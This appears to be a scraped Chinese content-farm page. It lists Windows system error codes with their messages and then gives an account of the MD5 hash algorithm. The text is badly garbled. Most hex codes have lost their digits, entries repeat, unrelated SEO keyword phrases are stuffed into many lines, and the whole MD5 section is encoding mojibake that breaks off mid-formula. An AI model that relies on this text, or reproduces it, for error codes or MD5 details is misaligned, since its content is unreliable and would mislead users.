1.代码是源码源码什么意思?
2.79C3125EAC1CE25EE2C99A9B01DFC00
3.十六进制编码的c语言是怎样的
代码是什么意思?
代码 含意
0 0x 作业完成。
1 0x 不正确的源码源码函数。
2 0x 系统找不到指定的源码源码档案。
3 0x 系统找不到指定的源码源码路径。
4 0x 系统无法开启档案。源码源码
5 0x 拒绝存取。源码源码答题网站源码推荐
6 0x 无效的源码源码代码。
7 0x 储存体控制区块已毁。源码源码
8 0x 储存体空间不足,源码源码无法处理这个指令。源码源码
9 0x 储存体控制区块地址无效。源码源码
0xA 环境不正确。源码源码
0xB 尝试加载一个格式错误的源码源码程序。
0xC 存取码错误。源码源码
0xD 资料错误。源码源码
0xE 储存体空间不够,无法完成这项作业。
0xF 系统找不到指定的磁盘驱动器。
0x 无法移除目录。
0x 无法移除目录。
0x 系统无法将档案移到 其它的磁盘驱动器。
0x 没有任何档案。
0x 储存媒体为写保护状态。
0x 系统找不到指定的装置。
0x 装置尚未就绪。
0x 装置无法识别指令。
0x 资料错误 (cyclic redundancy check)
0x 程序发出一个长度错误的指令。
0x 磁盘驱动器在磁盘找不到 持定的扇区或磁道。
0xA 指定的磁盘或磁盘无法存取。
0xB 磁盘驱动器找不到要求的扇区。
0xC 打印机没有纸。
0xD 系统无法将资料写入指定的磁盘驱动器。
0xE 系统无法读取指定的装置。
0xF 连接到系统的某个装置没有作用。
0x The process cannot access the file because it is being
used by another process.
0x 档案的一部份被锁定, 现在无法存取。
0x 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial
Number: %3) 插入磁盘机%1。
0x 开启的分享档案数量太多。
0x 到达档案结尾。
0x 磁盘已满。
0x 不支持这种网络要求。
0x 远程计算机无法使用。
0x 网络名称重复。
0x 网络路径找不到。
0x 网络忙碌中。
0x The specified network resource or device is no longer
available.
0x The network BIOS command limit has been reached.
0x 网络配接卡发生问题。
0xA 指定的天马客服系统源码服务器无法执行要求的作业。
0xB 网络发生意外错误。
0xC 远程配接卡不兼容。
0xD 打印机队列已满。
0xE 服务器的空间无法储存等候打印的档案。
0xF 等候打印的档案已经删除。
0x 指定的网络名称无法使用。
0x 拒绝存取网络。
0x 拒绝存取网络。
0x 网络资源类型错误。
0x 网络名称找不到。
0x 超过区域计算机网络配接卡的名称限制。
0x 超过网络 BIOS 作业阶段的限制。
0x 远程服务器已经暂停或者正在起始中。
0x 由于联机数目已达上限,此时无法再联机到这台远程计算机。
0x 指定的打印机或磁盘装置已经暂停作用。
0x 档案已经存在。
0x 无法建立目录或档案。
0x INT 0x 处理这项要求的储存体无法使用。
0x 近端装置名称已经在使用中。
0x 指定的网络密码错误。
0x 参数错误。
0x 网络发生资料写入错误。
0x 此时系统无法执行其它行程。
0x 无法建立其它的系统 semaphore。
0x 属于其它行程专用的 semaphore.
0x semaphore 已经设定,而且无法关闭。
0x 无法指定 semaphore 。
0x 在岔断时间无法要求专用的 semaphore 。
0x 在岔断时间无法要求专用的 semaphore 。
0x 此 semaphore 先前的拥有权已经结束。
0xA 请将磁盘插入 %1。
0xB 因为代用的磁盘尚未插入,所以程序已经停止。
0xC 磁盘正在使用中或被锁定。
0xD Pipe 已经中止。
0xE 系统无法开启指定的 装置或档案。
0xF 档名太长。
0x 磁盘空间不足。
0x 没有可用的内部档案标识符。
0x 目标内部档案标识符不正确。
0x 由应用程序所执行的 IOCTL 呼叫 不正确。
0x 写入验证参数值不正确。
0x 系统不支持所要求的指令。
0x 此项功能仅在 Win 模式有效
0x semaphore 超过逾时期间。
0xA 传到系统呼叫的资料区域 太小。
0xB 文件名、上古世纪瞬移源码目录名称或储存体卷标语法错误。
0xC 系统呼叫层次不正确。
0xD 磁盘没有设定卷标。
0xE 找不到指定的模块。
0xF 找不到指定的程序。
0x 没有子行程可供等待。
0x 没有子行程可供等待。
0x %1 这个应用程序无法在 Win 模式下执行。
0x Attempt to use a file handle to an open disk
partition for an operation other than raw disk I/O.
0x 尝试将档案指针移至档案开头之前。
0x 无法在指定的装置或档案,设定档案指针。
0x JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。
0x 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。
0x 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。
0x 系统尝试删除 未连结过的磁盘驱动器的连结关系。
0xA 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。
0xB 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
0xC 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
0x 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。
0xE 系统此刻无法执行 JOIN 或 SUBST。
0xF 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。
0x 这个目录不是根目录的子目录。
0x 目录仍有资料。
0x 指定的路径已经被替换过。
0x 资源不足,无法处理这项 指令。
0x 指定的路径这时候无法使用。
0x 指定的路径这时候无法使用。
0x 尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。
0x CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。
0x 指定的 semaphore事件 DosMuxSemWait 数目不正确。
0x DosMuxSemWait 没有执行;设定太多的 semaphore。
0x DosMuxSemWait 清单不正确。
0xA 您所输入的储存媒体标 元长度限制。
0xB 无法建立其它的执行绪。
0xC 接收行程拒绝接受信号。
0xD 区段已经被舍弃,无法被锁定。
0xE 区段已经解除锁定。
0xF 执行绪识别码的地址不正确。
0xA0 传到 DosExecPgm 的自变量字符串不正确。
0xA1 指定的路径不正确。
0xA2 信号等候处理。相亲软件源码购买
0xA4 系统无法建立执行绪。
0xA7 无法锁定档案的部份范围。
0xAA 所要求的资源正在使用中。
0xAD 取消范围的锁定要求不明显。
0xAE 档案系统不支持自动变更锁定类型。
0xB4 系统发现不正确的区段号码。
0xB6 操作系统无法执行 %1。
0xB6 操作系统无法执行 %1。
0xB7 档案已存在,无法建立同一档案。
0xBA 传送的旗号错误。
0xBB 指定的系统旗号找不到。
0xBC 操作系统无法执行 %1。
0xBD 操作系统无法执行 %1。
0xBE 操作系统无法执行 %1
0xBF 无法在 Win 模式下执行 %1。
0xC0 操作系统无法执行 %1。
0xC1 %1 不是正确的 Win 应用程序。
0xC2 操作系统无法执行 %1。
0xC3 操作系统无法执行 %1。
0xC4 操作系统无法执行 这个应用程序。
0xC5 操作系统目前无法执行 这个应用程序。
0xC6 操作系统无法执行 %1。
0xC7 操作系统无法执行 这个应用程序。
0xC8 程序代码的区段不可以大于或等于 KB。
0xC9 操作系统无法执行 %1。
0xCA 操作系统无法执行 %1。
0xCB 系统找不到输入的环境选项。\r
0xCD 在指令子目录下,没有任何行程有信号副处理程序。
0xCE 文件名称或扩展名太长。
0xCF ring 2 堆栈使用中。
0xCF ring 2 堆栈使用中。
0xD0 输入的通用档名字元 * 或 ? 不正确, 或指定太多的通用档名字元。
0xD1 所传送的信号不正确。
0xD2 无法设定信号处理程序。
0xD4 区段被锁定,而且无法重新配置。
0xD6 附加到此程序或动态连结模块的动态连结模块太多。
0xD7 Can’t nest calls to LoadModule.
0xE6 The pipe state is invalid.
0xE7 所有的 pipe instances 都在忙碌中。
0xE8 The pipe is being closed.
0xE9 No process is on the other end of the pipe.
0xEA 有更多可用的资料。
0xF0 作业阶段被取消。
0xFE 指定的延伸属性名称无效。
0xFF 延伸的属性不一致。
0x 没有可用的资料。
0xA 无法使用 Copy API。
0xB 目录名称错误。主力预备启动源码
0x 延伸属性不适用于缓冲区。
0x 在外挂的档案系统上的延伸属性档案已经毁损。
0x 延伸属性表格文件满。
0x 指定的延伸属性代码无效。
0x 指定的延伸属性代码无效。
0xA 外挂的这个档案系统不支持延伸属性。
0x 意图释放不属于叫用者的 mutex。
0xA semaphore 传送次数过多。
0xB 只完成 Read/WriteProcessMemory 的部份要求。
0xD 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。
0xE7 尝试存取无效的地址。
0x 运算结果超过 位。
0x 信道的另一端有一个行程在接送资料。
0x 等候行程来开启信道的另一端。
0xE2 存取延伸的属性被拒。
0xE3 由于执行绪结束或应用程序要求,而异常终止 I/O 作业。
0xE4 重叠的 I/O 事件不是设定成通知状态。
0xE5 正在处理重叠的 I/O 作业。
0xE6 对内存位置的无效存取。
0xE7 执行 inpage 作业发生错误。
0xE9 递归太深,堆栈满溢。
0xEA 窗口无法用来传送讯息。
0xEB 无法完成这项功能。
0xEC 旗号无效。
0xED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需
的系统驱动程序,而且该储存媒体并未毁损。
0xEE 储存该档案的外部媒体发出警告,表示该已开启档案已经无效。
0xEF 所要求的作业无法在全屏幕模式下执行。
0xF0 An attempt was made to reference a token that does
not exist.
0xF1 组态系统登录数据库毁损。
0xF2 组态系统登录机码无效。
0xF3 无法开启组态系统登录机码。
0xF4 无法读取组态系统登录机码。
0xF5 无法写入组态系统登录机码。
0xF6 系统登录数据库中的一个档案必须使用记录或其它备份还
原。 已经还原成功。
0xF7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映
对内存内容毁损、会是档案无法复原。
0xF8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。
0xF9 系统尝试将档案加载系统登录或将档案还原到系统登录中,
但是,指定档案的格式不是系统登录文件的格式。
0xFA 尝试在标示为删除的系统登录机码,执行不合法的操作。
0xFA 尝试在标示为删除的系统登录机码,执行不合法的操作。
0xFB 系统无法配置系统登录记录所需的空间。
0xFC 无法在已经有子机码或数值的系统登录机码建立符号连结。
0xFD 无法在临时机码下建立永久的子机码。
0xFE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传
回。呼叫者现在需要自行列举档案,找出变更的地方。
0xB 停止控制已经传送给其它服务 所依峙的一个服务。
0xC 要求的控制对此服务无效
0xF8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。
0xF9 系统尝试将档案加载系统登录或将档案还原到系统登录中,
但是,指定档案的格式不是系统登录文件的格式。
0xFA 尝试在标示为删除的系统登录机码,执行不合法的操作。
0xFA 尝试在标示为删除的系统登录机码,执行不合法的操作。
0xFB 系统无法配置系统登录记录所需的空间。
0xFC 无法在已经有子机码或数值的系统登录机码建立符号连结。
0xFD 无法在临时机码下建立永久的子机码。
0xFE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传
回。呼叫者现在需要自行列举档案,找出变更的地方。
0xB 停止控制已经传送给其它服务 所依峙的一个服务。
0xC 要求的控制对此服务无效
0xC 要求的控制对此服务无效
0xD The service did not respond to the start or control
request in a timely fashion. 0xE 无法建立服务的执行绪。
0xF 服务数据库被锁定。
0x 这种服务已经在执行。
0x 帐户名称错误或者不存在。
0x 指定的服务暂停作用,无法激活。
0x 指定循环服务从属关系。
0x 指定的服务不是安装进来的服务。
0x 该服务项目此时无法接收控制讯息。
0x 服务尚未激活。
0x 无法联机到服务控制程序。
0x 处理控制要求时,发生意外状况。
0x 指定的数据库不存在。
0xA 服务传回专属于服务的错误码。
0xB The process terminated unexpectedly.
0xC 从属服务或群组无法激活。
0xD 因为登入失败,所以没有激活服务。
0xE 在激活之后,服务在激活状态时当机。
0xF 指定服务数据库锁定无效。
0x 指定的服务已经标示为删除。
0x 指定的服务已经存在。
0x 系统目前正以上一次执行成功的组态执行。
0x 从属服务不存在,或已经标示为删除。
0x 目前的激活已经接受上一次执行成功的 控制设定。
0x 上一次激活之后,就没有再激活服务。
0x 指定的名称已经用于服务名称或服务显示 名称。
0xC 已经到了磁带的最后。
0xD 到了档案标示。
0xE 遇到磁带的开头或分割区。
0xC 已经到了磁带的最后。
0xD 到了档案标示。
0xE 遇到磁带的开头或分割区。
0xF 到了档案组的结尾。
0x 磁带没有任何资料。
0x 磁带无法制作分割区。
0x 存取多重容体的新磁带时,发现目前 区块大小错误。
0x 加载磁带时,找不到磁带分割区信息。
0x 无法锁住储存媒体退带功能。
0x 无法锁住储存媒体退带功能。
0x 无法解除加载储存媒体。
0x 磁盘驱动器中的储存媒体已经变更。
0x 已经重设 I/O 总线。
0x 磁盘驱动器没有任何储存媒体。
0x 目标 multi-byte code page,没有对应 Unicode 字符。
0xA 动态链接库 (DLL) 起始例程失败。
0xB 系统正在关机。
0xC 无法中止系统关机,因为没有关机的动作在进行中。
0xD 因为 I/O 装置发生错误,所以无法执行要求。
0xE 序列装置起始失败,会取消加载序列驱动程序。
0xF 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。
至少已经有一个使用同一IRQ 的其它装置已经开启。
0x A serial I/O operation was completed by another
write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
0x 因为已经过了逾时时间,所以序列 I/O 作业完成。
(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
0x 在磁盘找不到任何的 ID 地址标示。
0x 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
0x 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。
0x 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
0x 存取硬盘失败,重试后也无法作业。
0x 存取硬盘失败,重试后也无法作业。
0x 存取硬盘时,必须重设磁盘控制卡,但是 连重设的动作也失败。
0x 到了磁带的最后。
0xA 可用服务器储存空间不足,无法处理这项指令。
0xB 发现潜在的死锁条件。
0xC 指定的基本地址或档案位移没有适当 对齐。
0x 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。
0x 系统 BIOS 无法变更系统电源状态。
0xE 指定的程序需要新的 Windows 版本。
0xF 指定的程序不是 Windows 或 MS-DOS 程序。
0x 指定的程序已经激活,无法再激活一次。
0x 指定的程序是为旧版的 Windows 所写的。
0x 执行此应用程序所需的链接库档案之一毁损。
0x 没有应用程序与此项作业的指定档案建立关联。
0x 传送指令到应用程序发生错误。
0x 找不到执行此应用程序所需的链接库档案。
0xB0 指定的装置名称无效。
0xB1 装置现在虽然未联机,但是它是一个记忆联机。
0xB2 尝试记忆已经记住的装置。
0xB3 提供的网络路径找不到任何网络提供程序。
0xB3 提供的网络路径找不到任何网络提供程序。
0xB4 指定的网络提供程序名称错误。
0xB5 无法开启网络联机设定文件。
0xB6 网络联机设定文件坏掉。
0xB7 无法列举非容器。
0xB8 发生延伸的错误。
0xB9 指定的群组名称错误。
0xBA 指定的计算机名称错误。
0xBB 指定的事件名称错误。
0xBC 指定的网络名称错误。
0xBD 指定的服务名称错误。
0xBE 指定的网络名称错误。
0xBF 指定的资源共享名称错误。
0xC0 指定的密码错误。
0xC1 指定的讯息名称错误。
0xC2 指定的讯息目的地错误。
0xC3 所提供的条件与现有的条件组发生冲突。
0xC4 尝试与网络服务器联机,但是 与该服务器的联机已经太多。
0xC5 其它网络计算机已经在使用这个工作群组或网域名称。
CEAC1CEEE2CA9BDFC
å¯è½æ¯ç±»ä¼¼äºmd5çå å¯ç®æ³
---------------
md5çå ¨ç§°æ¯message-digest algorithm 5ï¼ä¿¡æ¯-æè¦ç®æ³ï¼ï¼å¨å¹´ä»£åç±mit laboratory for computer scienceårsa data security incçronald l. rivestå¼ååºæ¥ï¼ç»md2ãmd3åmd4åå±èæ¥ãå®çä½ç¨æ¯è®©å¤§å®¹éä¿¡æ¯å¨ç¨æ°åç¾å软件ç¾ç½²ç§äººå¯åå被"å缩"æä¸ç§ä¿å¯çæ ¼å¼ï¼å°±æ¯æä¸ä¸ªä»»æé¿åº¦çåè串åæ¢æä¸å®é¿ç大æ´æ°ï¼ãä¸ç®¡æ¯md2ãmd4è¿æ¯md5ï¼å®ä»¬é½éè¦è·å¾ä¸ä¸ªéæºé¿åº¦çä¿¡æ¯å¹¶äº§çä¸ä¸ªä½çä¿¡æ¯æè¦ãè½ç¶è¿äºç®æ³çç»ææå¤æå°æäºç¸ä¼¼ï¼ä½md2ç设计ä¸md4åmd5å®å ¨ä¸åï¼é£æ¯å 为md2æ¯ä¸º8ä½æºå¨åè¿è®¾è®¡ä¼åçï¼èmd4åmd5å´æ¯é¢åä½ççµèãè¿ä¸ä¸ªç®æ³çæè¿°åcè¯è¨æºä»£ç å¨internet rfcs ä¸æ详ç»çæè¿°ï¼h++p://www.ietf.org/rfc/rfc.txtï¼ï¼è¿æ¯ä¸ä»½ææå¨çææ¡£ï¼ç±ronald l. rivestå¨å¹´8æåieftæ交ã
rivestå¨å¹´å¼ååºmd2ç®æ³ãå¨è¿ä¸ªç®æ³ä¸ï¼é¦å 对信æ¯è¿è¡æ°æ®è¡¥ä½ï¼ä½¿ä¿¡æ¯çåèé¿åº¦æ¯çåæ°ãç¶åï¼ä»¥ä¸ä¸ªä½çæ£éªå追å å°ä¿¡æ¯æ«å°¾ã并ä¸æ ¹æ®è¿ä¸ªæ°äº§ççä¿¡æ¯è®¡ç®åºæ£åå¼ãåæ¥ï¼rogieråchauvaudåç°å¦æ忽ç¥äºæ£éªåå°äº§çmd2å²çªãmd2ç®æ³çå å¯åç»ææ¯å¯ä¸ç--æ¢æ²¡æéå¤ã
为äºå 强ç®æ³çå®å ¨æ§ï¼rivestå¨å¹´åå¼ååºmd4ç®æ³ãmd4ç®æ³åæ ·éè¦å¡«è¡¥ä¿¡æ¯ä»¥ç¡®ä¿ä¿¡æ¯çåèé¿åº¦å ä¸åè½è¢«æ´é¤ï¼ä¿¡æ¯åèé¿åº¦mod = ï¼ãç¶åï¼ä¸ä¸ªä»¥ä½äºè¿å¶è¡¨ç¤ºçä¿¡æ¯çæåé¿åº¦è¢«æ·»å è¿æ¥ãä¿¡æ¯è¢«å¤çæä½damg?rd/merkleè¿ä»£ç»æçåºåï¼èä¸æ¯ä¸ªåºåè¦éè¿ä¸ä¸ªä¸åæ¥éª¤çå¤çãden boeråbosselaers以åå ¶ä»äººå¾å¿«çåç°äºæ»å»md4çæ¬ä¸ç¬¬ä¸æ¥å第ä¸æ¥çæ¼æ´ãdobbertinå大家æ¼ç¤ºäºå¦ä½å©ç¨ä¸é¨æ®éç个人çµèå¨å åéå æ¾å°md4å®æ´çæ¬ä¸çå²çªï¼è¿ä¸ªå²çªå®é ä¸æ¯ä¸ç§æ¼æ´ï¼å®å°å¯¼è´å¯¹ä¸åçå 容è¿è¡å å¯å´å¯è½å¾å°ç¸åçå å¯åç»æï¼ã毫æ çé®ï¼md4å°±æ¤è¢«æ·æ±°æäºã
尽管md4ç®æ³å¨å®å ¨ä¸æ个è¿ä¹å¤§çæ¼æ´ï¼ä½å®å¯¹å¨å ¶åæ被å¼ååºæ¥ç好å ç§ä¿¡æ¯å®å ¨å å¯ç®æ³çåºç°å´æçä¸å¯å¿½è§çå¼å¯¼ä½ç¨ãé¤äºmd5以å¤ï¼å ¶ä¸æ¯è¾æåçè¿æsha-1ãripe-md以åhavalçã
ä¸å¹´ä»¥åï¼å³å¹´ï¼rivestå¼ååºææ¯ä¸æ´ä¸ºè¶è¿æççmd5ç®æ³ãå®å¨md4çåºç¡ä¸å¢å äº"å®å ¨-带å"ï¼safety-beltsï¼çæ¦å¿µãè½ç¶md5æ¯md4ç¨å¾®æ ¢ä¸äºï¼ä½å´æ´ä¸ºå®å ¨ãè¿ä¸ªç®æ³å¾ææ¾çç±å个åmd4设计æå°è®¸ä¸åçæ¥éª¤ç»æãå¨md5ç®æ³ä¸ï¼ä¿¡æ¯-æè¦ç大å°åå¡«å çå¿ è¦æ¡ä»¶ä¸md4å®å ¨ç¸åãden boeråbosselaersæ¾åç°md5ç®æ³ä¸çåå²çªï¼pseudo-collisionsï¼ï¼ä½é¤æ¤ä¹å¤å°±æ²¡æå ¶ä»è¢«åç°çå å¯åç»æäºã
van oorschotåwieneræ¾ç»èèè¿ä¸ä¸ªå¨æ£åä¸æ´åæ寻å²çªçå½æ°ï¼brute-force hash functionï¼ï¼èä¸ä»ä»¬çæµä¸ä¸ªè¢«è®¾è®¡ä¸é¨ç¨æ¥æç´¢md5å²çªçæºå¨ï¼è¿å°æºå¨å¨å¹´çå¶é ææ¬å¤§çº¦æ¯ä¸ç¾ä¸ç¾å ï¼å¯ä»¥å¹³åæ¯å¤©å°±æ¾å°ä¸ä¸ªå²çªãä½åä»å¹´å°å¹´è¿å¹´é´ï¼ç«æ²¡æåºç°æ¿ä»£md5ç®æ³çmd6æ被å«åå ¶ä»ä»ä¹ååçæ°ç®æ³è¿ä¸ç¹ï¼æ们就å¯ä»¥çåºè¿ä¸ªççµå¹¶æ²¡æ太å¤çå½±åmd5çå®å ¨æ§ãä¸é¢ææè¿äºé½ä¸è¶³ä»¥æ为md5çå¨å®é åºç¨ä¸çé®é¢ã并ä¸ï¼ç±äºmd5ç®æ³ç使ç¨ä¸éè¦æ¯ä»ä»»ä½çæè´¹ç¨çï¼æ以å¨ä¸è¬çæ åµä¸ï¼éç»å¯åºç¨é¢åãä½å³ä¾¿æ¯åºç¨å¨ç»å¯é¢åå ï¼md5ä¹ä¸å¤±ä¸ºä¸ç§é常ä¼ç§çä¸é´ææ¯ï¼ï¼md5æä¹é½åºè¯¥ç®å¾ä¸æ¯é常å®å ¨çäºã
ç®æ³çåºç¨
md5çå ¸ååºç¨æ¯å¯¹ä¸æ®µä¿¡æ¯ï¼messageï¼äº§çä¿¡æ¯æè¦ï¼message-digestï¼ï¼ä»¥é²æ¢è¢«ç¯¡æ¹ãæ¯å¦ï¼å¨unixä¸æå¾å¤è½¯ä»¶å¨ä¸è½½çæ¶åé½æä¸ä¸ªæ件åç¸åï¼æ件æ©å±å为.md5çæ件ï¼å¨è¿ä¸ªæ件ä¸é常åªæä¸è¡ææ¬ï¼å¤§è´ç»æå¦ï¼
md5 (tanajiya.tar.gz) = 0cab9c0fade
è¿å°±æ¯tanajiya.tar.gzæ件çæ°åç¾åãmd5å°æ´ä¸ªæ件å½ä½ä¸ä¸ªå¤§ææ¬ä¿¡æ¯ï¼éè¿å ¶ä¸å¯éçå符串åæ¢ç®æ³ï¼äº§çäºè¿ä¸ªå¯ä¸çmd5ä¿¡æ¯æè¦ãå¦æå¨ä»¥åä¼ æè¿ä¸ªæ件çè¿ç¨ä¸ï¼æ 论æ件çå 容åçäºä»»ä½å½¢å¼çæ¹åï¼å æ¬äººä¸ºä¿®æ¹æè ä¸è½½è¿ç¨ä¸çº¿è·¯ä¸ç¨³å®å¼èµ·çä¼ è¾é误çï¼ï¼åªè¦ä½ 对è¿ä¸ªæ件éæ°è®¡ç®md5æ¶å°±ä¼åç°ä¿¡æ¯æè¦ä¸ç¸åï¼ç±æ¤å¯ä»¥ç¡®å®ä½ å¾å°çåªæ¯ä¸ä¸ªä¸æ£ç¡®çæ件ãå¦æåæä¸ä¸ªç¬¬ä¸æ¹ç认è¯æºæï¼ç¨md5è¿å¯ä»¥é²æ¢æ件ä½è ç"æµèµ"ï¼è¿å°±æ¯æè°çæ°åç¾ååºç¨ã
md5è¿å¹¿æ³ç¨äºå å¯å解å¯ææ¯ä¸ãæ¯å¦å¨unixç³»ç»ä¸ç¨æ·çå¯ç å°±æ¯ä»¥md5ï¼æå ¶å®ç±»ä¼¼çç®æ³ï¼ç»å å¯ååå¨å¨æ件系ç»ä¸ãå½ç¨æ·ç»å½çæ¶åï¼ç³»ç»æç¨æ·è¾å ¥çå¯ç 计ç®æmd5å¼ï¼ç¶ååå»åä¿åå¨æ件系ç»ä¸çmd5å¼è¿è¡æ¯è¾ï¼è¿èç¡®å®è¾å ¥çå¯ç æ¯å¦æ£ç¡®ãéè¿è¿æ ·çæ¥éª¤ï¼ç³»ç»å¨å¹¶ä¸ç¥éç¨æ·å¯ç çæç çæ åµä¸å°±å¯ä»¥ç¡®å®ç¨æ·ç»å½ç³»ç»çåæ³æ§ãè¿ä¸ä½å¯ä»¥é¿å ç¨æ·çå¯ç è¢«å ·æç³»ç»ç®¡çåæéçç¨æ·ç¥éï¼èä¸è¿å¨ä¸å®ç¨åº¦ä¸å¢å äºå¯ç è¢«ç ´è§£çé¾åº¦ã
æ£æ¯å 为è¿ä¸ªåå ï¼ç°å¨è¢«é»å®¢ä½¿ç¨æå¤çä¸ç§ç ´è¯å¯ç çæ¹æ³å°±æ¯ä¸ç§è¢«ç§°ä¸º"è·åå ¸"çæ¹æ³ãæ两ç§æ¹æ³å¾å°åå ¸ï¼ä¸ç§æ¯æ¥å¸¸æéçç¨åå¯ç çå符串表ï¼å¦ä¸ç§æ¯ç¨æåç»åæ¹æ³çæçï¼å ç¨md5ç¨åºè®¡ç®åºè¿äºåå ¸é¡¹çmd5å¼ï¼ç¶ååç¨ç®æ çmd5å¼å¨è¿ä¸ªåå ¸ä¸æ£ç´¢ãæ们å设å¯ç çæ大é¿åº¦ä¸º8ä½åèï¼8 bytesï¼ï¼åæ¶å¯ç åªè½æ¯åæ¯åæ°åï¼å ±++=个å符ï¼æåç»ååºçåå ¸ç项æ°åæ¯p(,1)+p(,2)â¦.+p(,8)ï¼é£ä¹å·²ç»æ¯ä¸ä¸ªå¾å¤©æçæ°åäºï¼åå¨è¿ä¸ªåå ¸å°±éè¦tb级çç£çéµåï¼èä¸è¿ç§æ¹æ³è¿æä¸ä¸ªåæï¼å°±æ¯è½è·å¾ç®æ è´¦æ·çå¯ç md5å¼çæ åµä¸æå¯ä»¥ãè¿ç§å å¯ææ¯è¢«å¹¿æ³çåºç¨äºunixç³»ç»ä¸ï¼è¿ä¹æ¯ä¸ºä»ä¹unixç³»ç»æ¯ä¸è¬æä½ç³»ç»æ´ä¸ºååºä¸ä¸ªéè¦åå ã
ç®æ³æè¿°
对md5ç®æ³ç®è¦çåè¿°å¯ä»¥ä¸ºï¼md5以ä½åç»æ¥å¤çè¾å ¥çä¿¡æ¯ï¼ä¸æ¯ä¸åç»å被åå为个ä½ååç»ï¼ç»è¿äºä¸ç³»åçå¤çåï¼ç®æ³çè¾åºç±å个ä½åç»ç»æï¼å°è¿å个ä½åç»çº§èåå°çæä¸ä¸ªä½æ£åå¼ã
å¨md5ç®æ³ä¸ï¼é¦å éè¦å¯¹ä¿¡æ¯è¿è¡å¡«å ï¼ä½¿å ¶åèé¿åº¦å¯¹æ±ä½çç»æçäºãå æ¤ï¼ä¿¡æ¯çåèé¿åº¦ï¼bits lengthï¼å°è¢«æ©å±è³n*+ï¼å³n*+个åèï¼bytesï¼ï¼n为ä¸ä¸ªæ£æ´æ°ãå¡«å çæ¹æ³å¦ä¸ï¼å¨ä¿¡æ¯çåé¢å¡«å ä¸ä¸ª1åæ æ°ä¸ª0ï¼ç´å°æ»¡è¶³ä¸é¢çæ¡ä»¶æ¶æåæ¢ç¨0对信æ¯çå¡«å ãç¶åï¼å¨å¨è¿ä¸ªç»æåé¢éå ä¸ä¸ªä»¥ä½äºè¿å¶è¡¨ç¤ºçå¡«å åä¿¡æ¯é¿åº¦ãç»è¿è¿ä¸¤æ¥çå¤çï¼ç°å¨çä¿¡æ¯åèé¿åº¦=n*++=(n+1)*ï¼å³é¿åº¦æ°å¥½æ¯çæ´æ°åãè¿æ ·åçåå æ¯ä¸ºæ»¡è¶³åé¢å¤çä¸å¯¹ä¿¡æ¯é¿åº¦çè¦æ±ã
md5ä¸æå个ä½è¢«ç§°ä½é¾æ¥åéï¼chaining variableï¼çæ´æ°åæ°ï¼ä»ä»¬åå«ä¸ºï¼a=0xï¼b=0xabcdefï¼c=0xfedcbaï¼d=0xã
å½è®¾ç½®å¥½è¿å个é¾æ¥åéåï¼å°±å¼å§è¿å ¥ç®æ³çå轮循ç¯è¿ç®ã循ç¯ç次æ°æ¯ä¿¡æ¯ä¸ä½ä¿¡æ¯åç»çæ°ç®ã
å°ä¸é¢å个é¾æ¥åéå¤å¶å°å¦å¤å个åéä¸ï¼aå°aï¼bå°bï¼cå°cï¼då°dã
主循ç¯æåè½®ï¼md4åªæä¸è½®ï¼ï¼æ¯è½®å¾ªç¯é½å¾ç¸ä¼¼ã第ä¸è½®è¿è¡æ¬¡æä½ãæ¯æ¬¡æä½å¯¹aãbãcådä¸çå ¶ä¸ä¸ä¸ªä½ä¸æ¬¡é线æ§å½æ°è¿ç®ï¼ç¶åå°æå¾ç»æå ä¸ç¬¬å个åéï¼ææ¬çä¸ä¸ªååç»åä¸ä¸ªå¸¸æ°ãåå°æå¾ç»æåå³ç¯ç§»ä¸ä¸ªä¸å®çæ°ï¼å¹¶å ä¸aãbãcædä¸ä¹ä¸ãæåç¨è¯¥ç»æå代aãbãcædä¸ä¹ä¸ã
以ä¸ä¸æ¯æ¯æ¬¡æä½ä¸ç¨å°çå个é线æ§å½æ°ï¼æ¯è½®ä¸ä¸ªï¼ã
f(x,y,z) =(x&y)|((~x)&z)
g(x,y,z) =(x&z)|(y&(~z))
h(x,y,z) =x^y^z
i(x,y,z)=y^(x|(~z))
ï¼&æ¯ä¸ï¼|æ¯æï¼~æ¯éï¼^æ¯å¼æï¼
è¿å个å½æ°ç说æï¼å¦æxãyåzç对åºä½æ¯ç¬ç«åååçï¼é£ä¹ç»æçæ¯ä¸ä½ä¹åºæ¯ç¬ç«åååçã
fæ¯ä¸ä¸ªéä½è¿ç®çå½æ°ãå³ï¼å¦æxï¼é£ä¹yï¼å¦åzãå½æ°hæ¯éä½å¥å¶æä½ç¬¦ã
å设mj表示æ¶æ¯ç第j个ååç»ï¼ä»0å°ï¼ï¼<<
ff(a,b,c,d,mj,s,ti)表示a=b+((a+(f(b,c,d)+mj+ti)<< gg(a,b,c,d,mj,s,ti)表示a=b+((a+(g(b,c,d)+mj+ti)<< hh(a,b,c,d,mj,s,ti)表示a=b+((a+(h(b,c,d)+mj+ti)<< ii(a,b,c,d,mj,s,ti)表示a=b+((a+(i(b,c,d)+mj+ti)<<
è¿åè½®ï¼æ¥ï¼æ¯ï¼
第ä¸è½®
ff(a,b,c,d,m0,7,0xdaa)
